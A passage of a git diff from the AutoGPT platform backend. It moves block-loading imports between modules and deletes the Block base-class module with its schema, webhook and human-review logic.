+    inputs: Optional[BlockInput] = None
    credentials: Optional[dict[str, CredentialsMetaInput]] = None

    name: Optional[str] = None
@@ -398,7 +395,7 @@ class LibraryAgentPreset(LibraryAgentPresetCreatable):
                "Webhook must be included in AgentPreset query when webhookId is set"
            )

-        input_data: GraphInput = {}
+        input_data: BlockInput = {}
        input_credentials: dict[str, CredentialsMetaInput] = {}

        for preset_input in preset.InputPresets:
--- a/autogpt_platform/backend/backend/api/features/otto/service.py
+++ b/autogpt_platform/backend/backend/api/features/otto/service.py
@@ -5,8 +5,8 @@ from typing import Optional
 import aiohttp
 from fastapi import HTTPException

-from backend.blocks import get_block
 from backend.data import graph as graph_db
+from backend.data.block import get_block
 from backend.util.settings import Settings

 from .models import ApiResponse, ChatRequest, GraphData
--- a/autogpt_platform/backend/backend/api/features/store/content_handlers.py
+++ b/autogpt_platform/backend/backend/api/features/store/content_handlers.py
@@ -152,7 +152,7 @@ class BlockHandler(ContentHandler):

    async def get_missing_items(self, batch_size: int) -> list[ContentItem]:
        """Fetch blocks without embeddings."""
-        from backend.blocks import get_blocks
+        from backend.data.block import get_blocks

        # Get all available blocks
        all_blocks = get_blocks()
@@ -249,7 +249,7 @@ class BlockHandler(ContentHandler):

    async def get_stats(self) -> dict[str, int]:
        """Get statistics about block embedding coverage."""
-        from backend.blocks import get_blocks
+        from backend.data.block import get_blocks

        all_blocks = get_blocks()

--- a/autogpt_platform/backend/backend/api/features/store/content_handlers_test.py
+++ b/autogpt_platform/backend/backend/api/features/store/content_handlers_test.py
@@ -93,7 +93,7 @@ async def test_block_handler_get_missing_items(mocker):
    mock_existing = []

    with patch(
-        "backend.blocks.get_blocks",
+        "backend.data.block.get_blocks",
        return_value=mock_blocks,
    ):
        with patch(
@@ -135,7 +135,7 @@ async def test_block_handler_get_stats(mocker):
    mock_embedded = [{"count": 2}]

    with patch(
-        "backend.blocks.get_blocks",
+        "backend.data.block.get_blocks",
        return_value=mock_blocks,
    ):
        with patch(
@@ -327,7 +327,7 @@ async def test_block_handler_handles_missing_attributes():
    mock_blocks = {"block-minimal": mock_block_class}

    with patch(
-        "backend.blocks.get_blocks",
+        "backend.data.block.get_blocks",
        return_value=mock_blocks,
    ):
        with patch(
@@ -360,7 +360,7 @@ async def test_block_handler_skips_failed_blocks():
    mock_blocks = {"good-block": good_block, "bad-block": bad_block}

    with patch(
-        "backend.blocks.get_blocks",
+        "backend.data.block.get_blocks",
        return_value=mock_blocks,
    ):
        with patch(
--- a/autogpt_platform/backend/backend/api/features/store/embeddings.py
+++ b/autogpt_platform/backend/backend/api/features/store/embeddings.py
@@ -662,7 +662,7 @@ async def cleanup_orphaned_embeddings() -> dict[str, Any]:
                )
                current_ids = {row["id"] for row in valid_agents}
            elif content_type == ContentType.BLOCK:
-                from backend.blocks import get_blocks
+                from backend.data.block import get_blocks

                current_ids = set(get_blocks().keys())
            elif content_type == ContentType.DOCUMENTATION:
--- a/autogpt_platform/backend/backend/api/features/store/image_gen.py
+++ b/autogpt_platform/backend/backend/api/features/store/image_gen.py
@@ -7,6 +7,15 @@ from replicate.client import Client as ReplicateClient
 from replicate.exceptions import ReplicateError
 from replicate.helpers import FileOutput

+from backend.blocks.ideogram import (
+    AspectRatio,
+    ColorPalettePreset,
+    IdeogramModelBlock,
+    IdeogramModelName,
+    MagicPromptOption,
+    StyleType,
+    UpscaleOption,
+)
 from backend.data.graph import GraphBaseMeta
 from backend.data.model import CredentialsMetaInput, ProviderName
 from backend.integrations.credentials_store import ideogram_credentials
@@ -41,16 +50,6 @@ async def generate_agent_image_v2(graph: GraphBaseMeta | AgentGraph) -> io.Bytes
    if not ideogram_credentials.api_key:
        raise ValueError("Missing Ideogram API key")

-    from backend.blocks.ideogram import (
-        AspectRatio,
-        ColorPalettePreset,
-        IdeogramModelBlock,
-        IdeogramModelName,
-        MagicPromptOption,
-        StyleType,
-        UpscaleOption,
-    )
-
    name = graph.name
    description = f"{name} ({graph.description})" if graph.description else name

--- a/autogpt_platform/backend/backend/api/features/v1.py
+++ b/autogpt_platform/backend/backend/api/features/v1.py
@@ -40,11 +40,10 @@ from backend.api.model import (
    UpdateTimezoneRequest,
    UploadFileResponse,
 )
-from backend.blocks import get_block, get_blocks
 from backend.data import execution as execution_db
 from backend.data import graph as graph_db
 from backend.data.auth import api_key as api_key_db
-from backend.data.block import BlockInput, CompletedBlockOutput
+from backend.data.block import BlockInput, CompletedBlockOutput, get_block, get_blocks
 from backend.data.credit import (
    AutoTopUpConfig,
    RefundRequest,
--- a/autogpt_platform/backend/backend/api/rest_api.py
+++ b/autogpt_platform/backend/backend/api/rest_api.py
@@ -40,11 +40,11 @@ import backend.data.user
 import backend.integrations.webhooks.utils
 import backend.util.service
 import backend.util.settings
-from backend.blocks.llm import DEFAULT_LLM_MODEL
-from backend.copilot.completion_consumer import (
+from backend.api.features.chat.completion_consumer import (
    start_completion_consumer,
    stop_completion_consumer,
 )
+from backend.blocks.llm import DEFAULT_LLM_MODEL
 from backend.data.model import Credentials
 from backend.integrations.providers import ProviderName
 from backend.monitoring.instrumentation import instrument_fastapi
--- a/autogpt_platform/backend/backend/app.py
+++ b/autogpt_platform/backend/backend/app.py
@@ -38,9 +38,7 @@ def main(**kwargs):

    from backend.api.rest_api import AgentServer
    from backend.api.ws_api import WebsocketServer
-    from backend.copilot.executor.manager import CoPilotExecutor
-    from backend.data.db_manager import DatabaseManager
-    from backend.executor import ExecutionManager, Scheduler
+    from backend.executor import DatabaseManager, ExecutionManager, Scheduler
    from backend.notifications import NotificationManager

    run_processes(
@@ -50,7 +48,6 @@ def main(**kwargs):
        WebsocketServer(),
        AgentServer(),
        ExecutionManager(),
-        CoPilotExecutor(),
        **kwargs,
    )

--- a/autogpt_platform/backend/backend/blocks/init.py
+++ b/autogpt_platform/backend/backend/blocks/init.py
@@ -3,19 +3,22 @@ import logging
 import os
 import re
 from pathlib import Path
-from typing import Sequence, Type, TypeVar
+from typing import TYPE_CHECKING, TypeVar

-from backend.blocks._base import AnyBlockSchema, BlockType
 from backend.util.cache import cached

 logger = logging.getLogger(__name__)

+
+if TYPE_CHECKING:
+    from backend.data.block import Block
+
 T = TypeVar("T")


@cached(ttl_seconds=3600)
-def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
-    from backend.blocks._base import Block
+def load_all_blocks() -> dict[str, type["Block"]]:
+    from backend.data.block import Block
    from backend.util.settings import Config

    # Check if example blocks should be loaded from settings
@@ -47,8 +50,8 @@ def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
        importlib.import_module(f".{module}", package=__name__)

    # Load all Block instances from the available modules
-    available_blocks: dict[str, type["AnyBlockSchema"]] = {}
-    for block_cls in _all_subclasses(Block):
+    available_blocks: dict[str, type["Block"]] = {}
+    for block_cls in all_subclasses(Block):
        class_name = block_cls.__name__

        if class_name.endswith("Base"):
@@ -61,7 +64,7 @@ def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
                "please name the class with 'Base' at the end"
            )

-        block = block_cls()  # pyright: ignore[reportAbstractUsage]
+        block = block_cls.create()

        if not isinstance(block.id, str) or len(block.id) != 36:
            raise ValueError(
@@ -102,7 +105,7 @@ def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
        available_blocks[block.id] = block_cls

    # Filter out blocks with incomplete auth configs, e.g. missing OAuth server secrets
-    from ._utils import is_block_auth_configured
+    from backend.data.block import is_block_auth_configured

    filtered_blocks = {}
    for block_id, block_cls in available_blocks.items():
@@ -112,48 +115,11 @@ def load_all_blocks() -> dict[str, type["AnyBlockSchema"]]:
    return filtered_blocks


-def _all_subclasses(cls: type[T]) -> list[type[T]]:
+__all__ = ["load_all_blocks"]
+
+
+def all_subclasses(cls: type[T]) -> list[type[T]]:
    subclasses = cls.__subclasses__()
    for subclass in subclasses:
-        subclasses += _all_subclasses(subclass)
+        subclasses += all_subclasses(subclass)
    return subclasses
-
-
-# ============== Block access helper functions ============== #
-
-
-def get_blocks() -> dict[str, Type["AnyBlockSchema"]]:
-    return load_all_blocks()
-
-
-# Note on the return type annotation: https://github.com/microsoft/pyright/issues/10281
-def get_block(block_id: str) -> "AnyBlockSchema | None":
-    cls = get_blocks().get(block_id)
-    return cls() if cls else None
-
-
-@cached(ttl_seconds=3600)
-def get_webhook_block_ids() -> Sequence[str]:
-    return [
-        id
-        for id, B in get_blocks().items()
-        if B().block_type in (BlockType.WEBHOOK, BlockType.WEBHOOK_MANUAL)
-    ]
-
-
-@cached(ttl_seconds=3600)
-def get_io_block_ids() -> Sequence[str]:
-    return [
-        id
-        for id, B in get_blocks().items()
-        if B().block_type in (BlockType.INPUT, BlockType.OUTPUT)
-    ]
-
-
-@cached(ttl_seconds=3600)
-def get_human_in_the_loop_block_ids() -> Sequence[str]:
-    return [
-        id
-        for id, B in get_blocks().items()
-        if B().block_type == BlockType.HUMAN_IN_THE_LOOP
-    ]
--- a/autogpt_platform/backend/backend/blocks/_base.py
+++ b/autogpt_platform/backend/backend/blocks/_base.py
@@ -1,739 +0,0 @@
-import inspect
-import logging
-from abc import ABC, abstractmethod
-from enum import Enum
-from typing import (
-    TYPE_CHECKING,
-    Any,
-    Callable,
-    ClassVar,
-    Generic,
-    Optional,
-    Type,
-    TypeAlias,
-    TypeVar,
-    cast,
-    get_origin,
-)
-
-import jsonref
-import jsonschema
-from pydantic import BaseModel
-
-from backend.data.block import BlockInput, BlockOutput, BlockOutputEntry
-from backend.data.model import (
-    Credentials,
-    CredentialsFieldInfo,
-    CredentialsMetaInput,
-    SchemaField,
-    is_credentials_field_name,
-)
-from backend.integrations.providers import ProviderName
-from backend.util import json
-from backend.util.exceptions import (
-    BlockError,
-    BlockExecutionError,
-    BlockInputError,
-    BlockOutputError,
-    BlockUnknownError,
-)
-from backend.util.settings import Config
-
-logger = logging.getLogger(__name__)
-
-if TYPE_CHECKING:
-    from backend.data.execution import ExecutionContext
-    from backend.data.model import ContributorDetails, NodeExecutionStats
-
-    from ..data.graph import Link
-
-app_config = Config()
-
-
-BlockTestOutput = BlockOutputEntry | tuple[str, Callable[[Any], bool]]
-
-
-class BlockType(Enum):
-    STANDARD = "Standard"
-    INPUT = "Input"
-    OUTPUT = "Output"
-    NOTE = "Note"
-    WEBHOOK = "Webhook"
-    WEBHOOK_MANUAL = "Webhook (manual)"
-    AGENT = "Agent"
-    AI = "AI"
-    AYRSHARE = "Ayrshare"
-    HUMAN_IN_THE_LOOP = "Human In The Loop"
-
-
-class BlockCategory(Enum):
-    AI = "Block that leverages AI to perform a task."
-    SOCIAL = "Block that interacts with social media platforms."
-    TEXT = "Block that processes text data."
-    SEARCH = "Block that searches or extracts information from the internet."
-    BASIC = "Block that performs basic operations."
-    INPUT = "Block that interacts with input of the graph."
-    OUTPUT = "Block that interacts with output of the graph."
-    LOGIC = "Programming logic to control the flow of your agent"
-    COMMUNICATION = "Block that interacts with communication platforms."
-    DEVELOPER_TOOLS = "Developer tools such as GitHub blocks."
-    DATA = "Block that interacts with structured data."
-    HARDWARE = "Block that interacts with hardware."
-    AGENT = "Block that interacts with other agents."
-    CRM = "Block that interacts with CRM services."
-    SAFETY = (
-        "Block that provides AI safety mechanisms such as detecting harmful content"
-    )
-    PRODUCTIVITY = "Block that helps with productivity"
-    ISSUE_TRACKING = "Block that helps with issue tracking"
-    MULTIMEDIA = "Block that interacts with multimedia content"
-    MARKETING = "Block that helps with marketing"
-
-    def dict(self) -> dict[str, str]:
-        return {"category": self.name, "description": self.value}
-
-
-class BlockCostType(str, Enum):
-    RUN = "run"  # cost X credits per run
-    BYTE = "byte"  # cost X credits per byte
-    SECOND = "second"  # cost X credits per second
-
-
-class BlockCost(BaseModel):
-    cost_amount: int
-    cost_filter: BlockInput
-    cost_type: BlockCostType
-
-    def __init__(
-        self,
-        cost_amount: int,
-        cost_type: BlockCostType = BlockCostType.RUN,
-        cost_filter: Optional[BlockInput] = None,
-        **data: Any,
-    ) -> None:
-        super().__init__(
-            cost_amount=cost_amount,
-            cost_filter=cost_filter or {},
-            cost_type=cost_type,
-            **data,
-        )
-
-
-class BlockInfo(BaseModel):
-    id: str
-    name: str
-    inputSchema: dict[str, Any]
-    outputSchema: dict[str, Any]
-    costs: list[BlockCost]
-    description: str
-    categories: list[dict[str, str]]
-    contributors: list[dict[str, Any]]
-    staticOutput: bool
-    uiType: str
-
-
-class BlockSchema(BaseModel):
-    cached_jsonschema: ClassVar[dict[str, Any]]
-
-    @classmethod
-    def jsonschema(cls) -> dict[str, Any]:
-        if cls.cached_jsonschema:
-            return cls.cached_jsonschema
-
-        model = jsonref.replace_refs(cls.model_json_schema(), merge_props=True)
-
-        def ref_to_dict(obj):
-            if isinstance(obj, dict):
-                # OpenAPI <3.1 does not support sibling fields that has a $ref key
-                # So sometimes, the schema has an "allOf"/"anyOf"/"oneOf" with 1 item.
-                keys = {"allOf", "anyOf", "oneOf"}
-                one_key = next((k for k in keys if k in obj and len(obj[k]) == 1), None)
-                if one_key:
-                    obj.update(obj[one_key][0])
-
-                return {
-                    key: ref_to_dict(value)
-                    for key, value in obj.items()
-                    if not key.startswith("$") and key != one_key
-                }
-            elif isinstance(obj, list):
-                return [ref_to_dict(item) for item in obj]
-
-            return obj
-
-        cls.cached_jsonschema = cast(dict[str, Any], ref_to_dict(model))
-
-        return cls.cached_jsonschema
-
-    @classmethod
-    def validate_data(cls, data: BlockInput) -> str | None:
-        return json.validate_with_jsonschema(
-            schema=cls.jsonschema(),
-            data={k: v for k, v in data.items() if v is not None},
-        )
-
-    @classmethod
-    def get_mismatch_error(cls, data: BlockInput) -> str | None:
-        return cls.validate_data(data)
-
-    @classmethod
-    def get_field_schema(cls, field_name: str) -> dict[str, Any]:
-        model_schema = cls.jsonschema().get("properties", {})
-        if not model_schema:
-            raise ValueError(f"Invalid model schema {cls}")
-
-        property_schema = model_schema.get(field_name)
-        if not property_schema:
-            raise ValueError(f"Invalid property name {field_name}")
-
-        return property_schema
-
-    @classmethod
-    def validate_field(cls, field_name: str, data: BlockInput) -> str | None:
-        """
-        Validate the data against a specific property (one of the input/output name).
-        Returns the validation error message if the data does not match the schema.
-        """
-        try:
-            property_schema = cls.get_field_schema(field_name)
-            jsonschema.validate(json.to_dict(data), property_schema)
-            return None
-        except jsonschema.ValidationError as e:
-            return str(e)
-
-    @classmethod
-    def get_fields(cls) -> set[str]:
-        return set(cls.model_fields.keys())
-
-    @classmethod
-    def get_required_fields(cls) -> set[str]:
-        return {
-            field
-            for field, field_info in cls.model_fields.items()
-            if field_info.is_required()
-        }
-
-    @classmethod
-    def __pydantic_init_subclass__(cls, **kwargs):
-        """Validates the schema definition. Rules:
-        - Fields with annotation `CredentialsMetaInput` MUST be
-          named `credentials` or `*_credentials`
-        - Fields named `credentials` or `*_credentials` MUST be
-          of type `CredentialsMetaInput`
-        """
-        super().__pydantic_init_subclass__(**kwargs)
-
-        # Reset cached JSON schema to prevent inheriting it from parent class
-        cls.cached_jsonschema = {}
-
-        credentials_fields = cls.get_credentials_fields()
-
-        for field_name in cls.get_fields():
-            if is_credentials_field_name(field_name):
-                if field_name not in credentials_fields:
-                    raise TypeError(
-                        f"Credentials field '{field_name}' on {cls.__qualname__} "
-                        f"is not of type {CredentialsMetaInput.__name__}"
-                    )
-
-                CredentialsMetaInput.validate_credentials_field_schema(
-                    cls.get_field_schema(field_name), field_name
-                )
-
-            elif field_name in credentials_fields:
-                raise KeyError(
-                    f"Credentials field '{field_name}' on {cls.__qualname__} "
-                    "has invalid name: must be 'credentials' or *_credentials"
-                )
-
-    @classmethod
-    def get_credentials_fields(cls) -> dict[str, type[CredentialsMetaInput]]:
-        return {
-            field_name: info.annotation
-            for field_name, info in cls.model_fields.items()
-            if (
-                inspect.isclass(info.annotation)
-                and issubclass(
-                    get_origin(info.annotation) or info.annotation,
-                    CredentialsMetaInput,
-                )
-            )
-        }
-
-    @classmethod
-    def get_auto_credentials_fields(cls) -> dict[str, dict[str, Any]]:
-        """
-        Get fields that have auto_credentials metadata (e.g., GoogleDriveFileInput).
-
-        Returns a dict mapping kwarg_name -> {field_name, auto_credentials_config}
-
-        Raises:
-            ValueError: If multiple fields have the same kwarg_name, as this would
-                cause silent overwriting and only the last field would be processed.
-        """
-        result: dict[str, dict[str, Any]] = {}
-        schema = cls.jsonschema()
-        properties = schema.get("properties", {})
-
-        for field_name, field_schema in properties.items():
-            auto_creds = field_schema.get("auto_credentials")
-            if auto_creds:
-                kwarg_name = auto_creds.get("kwarg_name", "credentials")
-                if kwarg_name in result:
-                    raise ValueError(
-                        f"Duplicate auto_credentials kwarg_name '{kwarg_name}' "
-                        f"in fields '{result[kwarg_name]['field_name']}' and "
-                        f"'{field_name}' on {cls.__qualname__}"
-                    )
-                result[kwarg_name] = {
-                    "field_name": field_name,
-                    "config": auto_creds,
-                }
-        return result
-
-    @classmethod
-    def get_credentials_fields_info(cls) -> dict[str, CredentialsFieldInfo]:
-        result = {}
-
-        # Regular credentials fields
-        for field_name in cls.get_credentials_fields().keys():
-            result[field_name] = CredentialsFieldInfo.model_validate(
-                cls.get_field_schema(field_name), by_alias=True
-            )
-
-        # Auto-generated credentials fields (from GoogleDriveFileInput etc.)
-        for kwarg_name, info in cls.get_auto_credentials_fields().items():
-            config = info["config"]
-            # Build a schema-like dict that CredentialsFieldInfo can parse
-            auto_schema = {
-                "credentials_provider": [config.get("provider", "google")],
-                "credentials_types": [config.get("type", "oauth2")],
-                "credentials_scopes": config.get("scopes"),
-            }
-            result[kwarg_name] = CredentialsFieldInfo.model_validate(
-                auto_schema, by_alias=True
-            )
-
-        return result
-
-    @classmethod
-    def get_input_defaults(cls, data: BlockInput) -> BlockInput:
-        return data  # Return as is, by default.
-
-    @classmethod
-    def get_missing_links(cls, data: BlockInput, links: list["Link"]) -> set[str]:
-        input_fields_from_nodes = {link.sink_name for link in links}
-        return input_fields_from_nodes - set(data)
-
-    @classmethod
-    def get_missing_input(cls, data: BlockInput) -> set[str]:
-        return cls.get_required_fields() - set(data)
-
-
-class BlockSchemaInput(BlockSchema):
-    """
-    Base schema class for block inputs.
-    All block input schemas should extend this class for consistency.
-    """
-
-    pass
-
-
-class BlockSchemaOutput(BlockSchema):
-    """
-    Base schema class for block outputs that includes a standard error field.
-    All block output schemas should extend this class to ensure consistent error handling.
-    """
-
-    error: str = SchemaField(
-        description="Error message if the operation failed", default=""
-    )
-
-
-BlockSchemaInputType = TypeVar("BlockSchemaInputType", bound=BlockSchemaInput)
-BlockSchemaOutputType = TypeVar("BlockSchemaOutputType", bound=BlockSchemaOutput)
-
-
-class EmptyInputSchema(BlockSchemaInput):
-    pass
-
-
-class EmptyOutputSchema(BlockSchemaOutput):
-    pass
-
-
-# For backward compatibility - will be deprecated
-EmptySchema = EmptyOutputSchema
-
-
-# --8<-- [start:BlockWebhookConfig]
-class BlockManualWebhookConfig(BaseModel):
-    """
-    Configuration model for webhook-triggered blocks on which
-    the user has to manually set up the webhook at the provider.
-    """
-
-    provider: ProviderName
-    """The service provider that the webhook connects to"""
-
-    webhook_type: str
-    """
-    Identifier for the webhook type. E.g. GitHub has repo and organization level hooks.
-
-    Only for use in the corresponding `WebhooksManager`.
-    """
-
-    event_filter_input: str = ""
-    """
-    Name of the block's event filter input.
-    Leave empty if the corresponding webhook doesn't have distinct event/payload types.
-    """
-
-    event_format: str = "{event}"
-    """
-    Template string for the event(s) that a block instance subscribes to.
-    Applied individually to each event selected in the event filter input.
-
-    Example: `"pull_request.{event}"` -> `"pull_request.opened"`
-    """
-
-
-class BlockWebhookConfig(BlockManualWebhookConfig):
-    """
-    Configuration model for webhook-triggered blocks for which
-    the webhook can be automatically set up through the provider's API.
-    """
-
-    resource_format: str
-    """
-    Template string for the resource that a block instance subscribes to.
-    Fields will be filled from the block's inputs (except `payload`).
-
-    Example: `f"{repo}/pull_requests"` (note: not how it's actually implemented)
-
-    Only for use in the corresponding `WebhooksManager`.
-    """
-    # --8<-- [end:BlockWebhookConfig]
-
-
-class Block(ABC, Generic[BlockSchemaInputType, BlockSchemaOutputType]):
-    def __init__(
-        self,
-        id: str = "",
-        description: str = "",
-        contributors: list["ContributorDetails"] = [],
-        categories: set[BlockCategory] | None = None,
-        input_schema: Type[BlockSchemaInputType] = EmptyInputSchema,
-        output_schema: Type[BlockSchemaOutputType] = EmptyOutputSchema,
-        test_input: BlockInput | list[BlockInput] | None = None,
-        test_output: BlockTestOutput | list[BlockTestOutput] | None = None,
-        test_mock: dict[str, Any] | None = None,
-        test_credentials: Optional[Credentials | dict[str, Credentials]] = None,
-        disabled: bool = False,
-        static_output: bool = False,
-        block_type: BlockType = BlockType.STANDARD,
-        webhook_config: Optional[BlockWebhookConfig | BlockManualWebhookConfig] = None,
-        is_sensitive_action: bool = False,
-    ):
-        """
-        Initialize the block with the given schema.
-
-        Args:
-            id: The unique identifier for the block, this value will be persisted in the
-                DB. So it should be a unique and constant across the application run.
-                Use the UUID format for the ID.
-            description: The description of the block, explaining what the block does.
-            contributors: The list of contributors who contributed to the block.
-            input_schema: The schema, defined as a Pydantic model, for the input data.
-            output_schema: The schema, defined as a Pydantic model, for the output data.
-            test_input: The list or single sample input data for the block, for testing.
-            test_output: The list or single expected output if the test_input is run.
-            test_mock: function names on the block implementation to mock on test run.
-            disabled: If the block is disabled, it will not be available for execution.
-            static_output: Whether the output links of the block are static by default.
-        """
-        from backend.data.model import NodeExecutionStats
-
-        self.id = id
-        self.input_schema = input_schema
-        self.output_schema = output_schema
-        self.test_input = test_input
-        self.test_output = test_output
-        self.test_mock = test_mock
-        self.test_credentials = test_credentials
-        self.description = description
-        self.categories = categories or set()
-        self.contributors = contributors or set()
-        self.disabled = disabled
-        self.static_output = static_output
-        self.block_type = block_type
-        self.webhook_config = webhook_config
-        self.is_sensitive_action = is_sensitive_action
-        self.execution_stats: "NodeExecutionStats" = NodeExecutionStats()
-
-        if self.webhook_config:
-            if isinstance(self.webhook_config, BlockWebhookConfig):
-                # Enforce presence of credentials field on auto-setup webhook blocks
-                if not (cred_fields := self.input_schema.get_credentials_fields()):
-                    raise TypeError(
-                        "credentials field is required on auto-setup webhook blocks"
-                    )
-                # Disallow multiple credentials inputs on webhook blocks
-                elif len(cred_fields) > 1:
-                    raise ValueError(
-                        "Multiple credentials inputs not supported on webhook blocks"
-                    )
-
-                self.block_type = BlockType.WEBHOOK
-            else:
-                self.block_type = BlockType.WEBHOOK_MANUAL
-
-            # Enforce shape of webhook event filter, if present
-            if self.webhook_config.event_filter_input:
-                event_filter_field = self.input_schema.model_fields[
-                    self.webhook_config.event_filter_input
-                ]
-                if not (
-                    isinstance(event_filter_field.annotation, type)
-                    and issubclass(event_filter_field.annotation, BaseModel)
-                    and all(
-                        field.annotation is bool
-                        for field in event_filter_field.annotation.model_fields.values()
-                    )
-                ):
-                    raise NotImplementedError(
-                        f"{self.name} has an invalid webhook event selector: "
-                        "field must be a BaseModel and all its fields must be boolean"
-                    )
-
-            # Enforce presence of 'payload' input
-            if "payload" not in self.input_schema.model_fields:
-                raise TypeError(
-                    f"{self.name} is webhook-triggered but has no 'payload' input"
-                )
-
-            # Disable webhook-triggered block if webhook functionality not available
-            if not app_config.platform_base_url:
-                self.disabled = True
-
-    @abstractmethod
-    async def run(self, input_data: BlockSchemaInputType, **kwargs) -> BlockOutput:
-        """
-        Run the block with the given input data.
-        Args:
-            input_data: The input data with the structure of input_schema.
-
-        Kwargs: Currently 14/02/2025 these include
-            graph_id: The ID of the graph.
-            node_id: The ID of the node.
-            graph_exec_id: The ID of the graph execution.
-            node_exec_id: The ID of the node execution.
-            user_id: The ID of the user.
-
-        Returns:
-            A Generator that yields (output_name, output_data).
-            output_name: One of the output name defined in Block's output_schema.
-            output_data: The data for the output_name, matching the defined schema.
-        """
-        # --- satisfy the type checker, never executed -------------
-        if False:  # noqa: SIM115
-            yield "name", "value"  # pyright: ignore[reportMissingYield]
-        raise NotImplementedError(f"{self.name} does not implement the run method.")
-
-    async def run_once(
-        self, input_data: BlockSchemaInputType, output: str, **kwargs
-    ) -> Any:
-        async for item in self.run(input_data, **kwargs):
-            name, data = item
-            if name == output:
-                return data
-        raise ValueError(f"{self.name} did not produce any output for {output}")
-
-    def merge_stats(self, stats: "NodeExecutionStats") -> "NodeExecutionStats":
-        self.execution_stats += stats
-        return self.execution_stats
-
-    @property
-    def name(self):
-        return self.__class__.__name__
-
-    def to_dict(self):
-        return {
-            "id": self.id,
-            "name": self.name,
-            "inputSchema": self.input_schema.jsonschema(),
-            "outputSchema": self.output_schema.jsonschema(),
-            "description": self.description,
-            "categories": [category.dict() for category in self.categories],
-            "contributors": [
-                contributor.model_dump() for contributor in self.contributors
-            ],
-            "staticOutput": self.static_output,
-            "uiType": self.block_type.value,
-        }
-
-    def get_info(self) -> BlockInfo:
-        from backend.data.credit import get_block_cost
-
-        return BlockInfo(
-            id=self.id,
-            name=self.name,
-            inputSchema=self.input_schema.jsonschema(),
-            outputSchema=self.output_schema.jsonschema(),
-            costs=get_block_cost(self),
-            description=self.description,
-            categories=[category.dict() for category in self.categories],
-            contributors=[
-                contributor.model_dump() for contributor in self.contributors
-            ],
-            staticOutput=self.static_output,
-            uiType=self.block_type.value,
-        )
-
-    async def execute(self, input_data: BlockInput, **kwargs) -> BlockOutput:
-        try:
-            async for output_name, output_data in self._execute(input_data, **kwargs):
-                yield output_name, output_data
-        except Exception as ex:
-            if isinstance(ex, BlockError):
-                raise ex
-            else:
-                raise (
-                    BlockExecutionError
-                    if isinstance(ex, ValueError)
-                    else BlockUnknownError
-                )(
-                    message=str(ex),
-                    block_name=self.name,
-                    block_id=self.id,
-                ) from ex
-
-    async def is_block_exec_need_review(
-        self,
-        input_data: BlockInput,
-        *,
-        user_id: str,
-        node_id: str,
-        node_exec_id: str,
-        graph_exec_id: str,
-        graph_id: str,
-        graph_version: int,
-        execution_context: "ExecutionContext",
-        **kwargs,
-    ) -> tuple[bool, BlockInput]:
-        """
-        Check if this block execution needs human review and handle the review process.
-
-        Returns:
-            Tuple of (should_pause, input_data_to_use)
-            - should_pause: True if execution should be paused for review
-            - input_data_to_use: The input data to use (may be modified by reviewer)
-        """
-        if not (
-            self.is_sensitive_action and execution_context.sensitive_action_safe_mode
-        ):
-            return False, input_data
-
-        from backend.blocks.helpers.review import HITLReviewHelper
-
-        # Handle the review request and get decision
-        decision = await HITLReviewHelper.handle_review_decision(
-            input_data=input_data,
-            user_id=user_id,
-            node_id=node_id,
-            node_exec_id=node_exec_id,
-            graph_exec_id=graph_exec_id,
-            graph_id=graph_id,
-            graph_version=graph_version,
-            block_name=self.name,
-            editable=True,
-        )
-
-        if decision is None:
-            # We're awaiting review - pause execution
-            return True, input_data
-
-        if not decision.should_proceed:
-            # Review was rejected, raise an error to stop execution
-            raise BlockExecutionError(
-                message=f"Block execution rejected by reviewer: {decision.message}",
-                block_name=self.name,
-                block_id=self.id,
-            )
-
-        # Review was approved - use the potentially modified data
-        # ReviewResult.data must be a dict for block inputs
-        reviewed_data = decision.review_result.data
-        if not isinstance(reviewed_data, dict):
-            raise BlockExecutionError(
-                message=f"Review data must be a dict for block input, got {type(reviewed_data).__name__}",
-                block_name=self.name,
-                block_id=self.id,
-            )
-        return False, reviewed_data
-
-    async def _execute(self, input_data: BlockInput, **kwargs) -> BlockOutput:
-        # Check for review requirement only if running within a graph execution context
-        # Direct block execution (e.g., from chat) skips the review process
-        has_graph_context = all(
-            key in kwargs
-            for key in (
-                "node_exec_id",
-                "graph_exec_id",
-                "graph_id",
-                "execution_context",
-            )
-        )
-        if has_graph_context:
-            should_pause, input_data = await self.is_block_exec_need_review(
-                input_data, **kwargs
-            )
-            if should_pause:
-                return
-
-        # Validate the input data (original or reviewer-modified) once
-        if error := self.input_schema.validate_data(input_data):
-            raise BlockInputError(
-                message=f"Unable to execute block with invalid input data: {error}",
-                block_name=self.name,
-                block_id=self.id,
-            )
-
-        # Use the validated input data
-        async for output_name, output_data in self.run(
-            self.input_schema(**{k: v for k, v in input_data.items() if v is not None}),
-            **kwargs,
-        ):
-            if output_name == "error":
-                raise BlockExecutionError(
-                    message=output_data, block_name=self.name, block_id=self.id
-                )
-            if self.block_type == BlockType.STANDARD and (
-                error := self.output_schema.validate_field(output_name, output_data)
-            ):
-                raise BlockOutputError(
-                    message=f"Block produced an invalid output data: {error}",
-                    block_name=self.name,
-                    block_id=self.id,
-                )
-            yield output_name, output_data
-
-    def is_triggered_by_event_type(
-        self, trigger_config: dict[str, Any], event_type: str
-    ) -> bool:
-        if not self.webhook_config:
-            raise TypeError("This method can't be used on non-trigger blocks")
-        if not self.webhook_config.event_filter_input:
-            return True
-        event_filter = trigger_config.get(self.webhook_config.event_filter_input)
-        if not event_filter:
-            raise ValueError("Event filter is not configured on trigger")
-        return event_type in [
-            self.webhook_config.event_format.format(event=k)
-            for k in event_filter
-            if event_filter[k] is True
-        ]
-
-
-# Type alias for any block with standard input/output schemas
-AnyBlockSchema: TypeAlias = Block[BlockSchemaInput, BlockSchemaOutput]
--- a/autogpt_platform/backend/backend/blocks/_utils.py
+++ b/autogpt_platform/backend/backend/blocks/_utils.py
@@ -1,122 +0,0 @@
-import logging
-import os
-
-from backend.integrations.providers import ProviderName
-
-from ._base import AnyBlockSchema
-
-logger = logging.getLogger(__name__)
-
-
-def is_block_auth_configured(
-    block_cls: type[AnyBlockSchema],
-) -> bool:
-    """
-    Check if a block has a valid authentication method configured at runtime.
-
-    For example if a block is an OAuth-only block and there env vars are not set,
-    do not show it in the UI.
-
-    """
-    from backend.sdk.registry import AutoRegistry
-
-    # Create an instance to access input_schema
-    try:
-        block = block_cls()
-    except Exception as e:
-        # If we can't create a block instance, assume it's not OAuth-only
